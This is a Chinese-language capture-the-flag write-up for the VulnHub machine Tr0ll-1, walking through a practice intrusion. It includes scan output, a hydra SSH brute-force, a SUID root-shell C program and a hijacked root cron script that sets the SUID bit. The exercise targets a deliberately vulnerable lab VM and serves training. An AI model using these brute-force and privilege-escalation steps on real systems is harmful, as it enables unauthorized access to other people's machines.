Tr0ll-1 Writeup

Tr0ll-1 VM下载地址：https://www.vulnhub.com/entry/tr0ll-1,100/

Tr0ll灵感来源于OSCP实验室中那些不断旋转的机器。目标很简单明确，就是获取root权限，从root的根目录里面获取Proof.txt。

难道不是太高，应该不会让做题者沮丧。温馨提醒，前方有巨魔(trolls )！

难度系数：Beginner  类型：boot2root

下载好VM，然后在VMware里面打开，想尽一切办法捣鼓登陆进去获取root权限。

win arp -a一下，Linux netdiscover 也能发现该台VM的ip

环境刺探

nmap全部端口扫起来 看看有哪些猫腻

发现ftp可以匿名访问 有个lol.pcap文件 80端口有个目录/secret

root@kali:~/Desktop# nmap -p 1-65535 -sV -sS -A -T4 192.168.1.105

Starting Nmap 6.45 ( http://nmap.org ) at 2015-01-08 08:58 EST
Nmap scan report for 192.168.1.105
Host is up (0.00057s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.2
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rwxrwxrwx 1 1000 0 8068 Aug 09 23:43 lol.pcap [NSE: writeable]
22/tcp open ssh (protocol 2.0)
| ssh-hostkey: 
| 1024 d6:18:d9:ef:75:d3:1c:29:be:14:b5:2b:18:54:a9:c0 (DSA)
| 2048 ee:8c:64:87:44:39:53:8c:24:fe:9d:39:a9:ad:ea:db (RSA)
|_ 256 0e:66:e6:50:cf:56:3b:9c:67:8b:5f:56:ca:ae:6b:f4 (ECDSA)
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
| http-robots.txt: 1 disallowed entry 
|_/secret
|_http-title: Site doesn't have a title (text/html).
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
SF-Port22-TCP:V=6.45%I=7%D=1/8%Time=54AE8D09%P=i686-pc-linux-gnu%r(NULL,29
SF:,"SSH-2\.0-OpenSSH_6\.6\.1p1\x20Ubuntu-2ubuntu2\r\n");
MAC Address: 00:0C:29:DF:FB:D1 (VMware)
No exact OS matches for host (If you know what OS is running on it, see http://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=6.45%E=4%D=1/8%OT=21%CT=1%CU=42233%PV=Y%DS=1%DC=D%G=Y%M=000C29%TM
OS:=54AE8D15%P=i686-pc-linux-gnu)SEQ(SP=103%GCD=1%ISR=10C%TI=Z%CI=I%II=I%TS
OS:=8)OPS(O1=M5B4ST11NW6%O2=M5B4ST11NW6%O3=M5B4NNT11NW6%O4=M5B4ST11NW6%O5=M
OS:5B4ST11NW6%O6=M5B4ST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6=71
OS:20)ECN(R=Y%DF=Y%T=40%W=7210%O=M5B4NNSNW6%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=
OS:S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q
OS:=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A
OS:%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y
OS:%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T
OS:=40%CD=S)

Network Distance: 1 hop
Service Info: OS: Unix

TRACEROUTE
HOP RTT ADDRESS
1 0.57 ms 192.168.1.105

OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.58 seconds

服务枚举 （ Service Enumeration）

端口结果如下：

FTP挖掘 （FTP Enumeration）

root@kali:~/Desktop# ftp 192.168.1.105
Connected to 192.168.1.105.
220 (vsFTPd 3.0.2)
Name (192.168.1.105:root): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> dir
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rwxrwxrwx 1 1000 0 8068 Aug 09 23:43 lol.pcap
226 Directory send OK.
ftp> get lol.pcap
local: lol.pcap remote: lol.pcap
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for lol.pcap (8068 bytes).
226 Transfer complete.
8068 bytes received in 0.03 secs (247.7 kB/s)
ftp> exit
221 Goodbye.

ftp匿名登陆anonymous/anonymous 下载到一个网络包lol.pcap

wireshark打开lol.pcap 发现提示：

FTP Data (-rw-r--r--    1 0        0             147 Aug 10 00:38 secret_stuff.txt)

和

FTP Data (Well, well, well, aren’t you just a clever little devil, you almost found the sup3rs3cr3tdirlol 😛 Sucks, you were so close… gotta TRY HARDER!)

鉴于只发现了SSH/FTP/HTTP 所以快速尝试 root/sup3rs3cr3tdirlol 登陆ssh 失败告终！

HTTP枚举（HTTP Enumeration）

nmap --script=http-enum -p80 -n 192.168.1.105

root@kali:~/Desktop# nmap --script=http-enum -p80 -n 192.168.1.105

Starting Nmap 6.45 ( http://nmap.org ) at 2015-01-08 09:23 EST
Nmap scan report for 192.168.1.105
Host is up (0.00048s latency).
PORT STATE SERVICE
80/tcp open http
| http-enum: 
| /robots.txt: Robots file
|_ /secret/: Potentially interesting folder
MAC Address: 00:0C:29:DF:FB:D1 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.68 seconds

web页面打开是这个样子

根据nmap扫描结果，浏览器里访问http://192.168.1.105/secret/目录； 看到一张逗比图片 查看源代码也没发现问题 研究了一下图片 也没啥收获

灵机一动 仔细看这个黑客字符串 是不是说

sup3rs3cr3tdirlol

supersecretdirlol

super secret dir lol

把上面的sup3rs3cr3tdirlol当做目录一输入 呵呵呵

http://192.168.1.105/sup3rs3cr3tdirlol/

获得一个二进制文件roflmao；strings查找可打印的字符串：

root@kali:~/Desktop/ted# strings roflmao
/lib/ld-linux.so.2
libc.so.6
_IO_stdin_used
printf
__libc_start_main
__gmon_start__
GLIBC_2.0
PTRh
[^_]
Find address 0x0856BF to proceed
;*2$"

看起来二进制程序只是打印了个“0x0856BF”？那就随手在ip后面输入0x0856BF做目录，我也没指望成功，但是奇迹就这么出现了，原来奇迹还是有的，万一你试成功了呢？

第一个目录是这样：

http://192.168.1.105/0x0856BF/good_luck/which_one_lol.txt

maleus
ps-aux
felux
Eagle11
genphlux < -- Definitely not this one
usmc8892
blawrg
wytshadow
vis1t0r
overflow

第二个目录里面是这个txt：

http://192.168.1.105/0x0856BF/this_folder_contains_the_password/Pass.txt

Good_job_:)

拿which_one_lol.txt做用户名字典 Pass.txt里面的做密码字典 hydra开一个线程小跑一下

root@kali:~/Desktop/ted# hydra -L which_one_lol.txt -P Pass.txt 192.168.1.105 -t 1 ssh -vV
Hydra v7.6 (c)2013 by van Hauser/THC & David Maciejak - for legal purposes only

Hydra (http://www.thc.org/thc-hydra) starting at 2015-01-08 09:36:58
[DATA] 1 task, 1 server, 10 login tries (l:10/p:1), ~10 tries per task
[DATA] attacking service ssh on port 22
[VERBOSE] Resolving addresses ... done
[ATTEMPT] target 192.168.1.105 - login "overflow" - pass "Good_job_:)" - 1 of 10 [child 0]
[ERROR] could not connect to target port 22
[ERROR] ssh protocol error
[VERBOSE] Retrying connection for child 0
[RE-ATTEMPT] target 192.168.1.105 - login "overflow" - pass "Good_job_:)" - 1 of 10 [child 0]
[ERROR] could not connect to target port 22
[ERROR] ssh protocol error
[VERBOSE] Retrying connection for child 0
[RE-ATTEMPT] target 192.168.1.105 - login "overflow" - pass "Good_job_:)" - 1 of 10 [child 0]
[ERROR] could not connect to target port 22
[ERROR] ssh protocol error
[ERROR] Too many connect errors to target, disabling ssh://192.168.1.105:22
0 of 1 target completed, 0 valid passwords found
[ERROR] 1 target did not resolve or could not be connected
Hydra (http://www.thc.org/thc-hydra) finished at 2015-01-08 09:36:59

爆破最后出错 没成功 估计是iptables做了限制 想半天 最后试了一下密码就是"Pass.txt" 淡淡的忧伤

root@kali:~/Desktop/ted# hydra -L which_one_lol.txt -p Pass.txt 192.168.1.105 -t 1 ssh -vV
Hydra v7.6 (c)2013 by van Hauser/THC & David Maciejak - for legal purposes only

Hydra (http://www.thc.org/thc-hydra) starting at 2015-01-08 09:38:13
[DATA] 1 task, 1 server, 10 login tries (l:10/p:1), ~10 tries per task
[DATA] attacking service ssh on port 22
[VERBOSE] Resolving addresses ... done
[ATTEMPT] target 192.168.1.105 - login "overflow" - pass "Pass.txt" - 1 of 10 [child 0]
[22][ssh] host: 192.168.1.105   login: overflow   password: Pass.txt
[ATTEMPT] target 192.168.1.105 - login "maleus" - pass "Pass.txt" - 2 of 10 [child 0]
[ATTEMPT] target 192.168.1.105 - login "ps-aux" - pass "Pass.txt" - 3 of 10 [child 0]
[ATTEMPT] target 192.168.1.105 - login "felux" - pass "Pass.txt" - 4 of 10 [child 0]
[ATTEMPT] target 192.168.1.105 - login "Eagle11" - pass "Pass.txt" - 5 of 10 [child 0]
[ATTEMPT] target 192.168.1.105 - login "genphlux" - pass "Pass.txt" - 6 of 10 [child 0]
[ATTEMPT] target 192.168.1.105 - login "usmc8892" - pass "Pass.txt" - 7 of 10 [child 0]

权限提升

登陆进去发现权限不够 是要提权的节奏 而且登录一段时间就被踢出来 提示TIMES UP LOL!

root@kali:~# ssh 192.168.1.105 -l overflow
The authenticity of host '192.168.1.105 (192.168.1.105)' can't be established.
ECDSA key fingerprint is 0e:66:e6:50:cf:56:3b:9c:67:8b:5f:56:ca:ae:6b:f4.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.1.105' (ECDSA) to the list of known hosts.
overflow@192.168.1.105's password: 
Welcome to Ubuntu 14.04.1 LTS (GNU/Linux 3.13.0-32-generic i686)

 * Documentation:  https://help.ubuntu.com/

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.


The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

Last login: Thu Jan  8 06:45:19 2015
Could not chdir to home directory /home/overflow: No such file or directory
$ id
uid=1002(overflow) gid=1002(overflow) groups=1002(overflow)
$ 

下载脚本 枚举可写文件

#########################################
## 777 Files                           ##
#########################################

/srv/ftp/lol.pcap
/var/tmp/cleaner.py.swp
/var/www/html/sup3rs3cr3tdirlol/roflmao
/var/log/cronlog
/lib/log/cleaner.py

/lib/log/cleaner.py 文件具备root权限 而且被crontab 定时清除tmp目录

opt/lmao.py没有权限查看 那么覆盖cleaner.py

os.system('/opt/lmao.py > /tmp/out.txt')

在out.txt看到lmao.py代码

#!/usr/bin/env python
import os
 
os.system('echo "TIMES UP LOL!"|wall')
os.system("pkill -u 'overflow'")
sys.exit()

编译我们的suid ， wget上去

int main(void) {
    setgid(0); setuid(0);
    system("/bin/bash");
}

果断替换cleaner.py文件为：

#!/usr/bin/env python
import os
import sys
try:
    os.system('chown root:root /var/tmp/suid; chmod 4777 /var/tmp/suid')
except:
    sys.exit()

过会儿重连 执行我们的suid就root了

:# /var/tmp/suid

:# cat /root/proof.txt

Good job, you did it!

702a8c18d29c6f3ca0d99ef5712bfbdc

:# id

uid=0(root) gid=0(root) groups=0(root),1002(overflow)

:# whoami

root

【参考：Tr0ll 1 Walkthrough & THERE BE TROLLS AHEAD! 作者：上头欢乐送 】

本文作者：上头欢乐送

本文为安全脉搏专栏作者发布，转载请注明：https://www.secpulse.com/archives/3906.html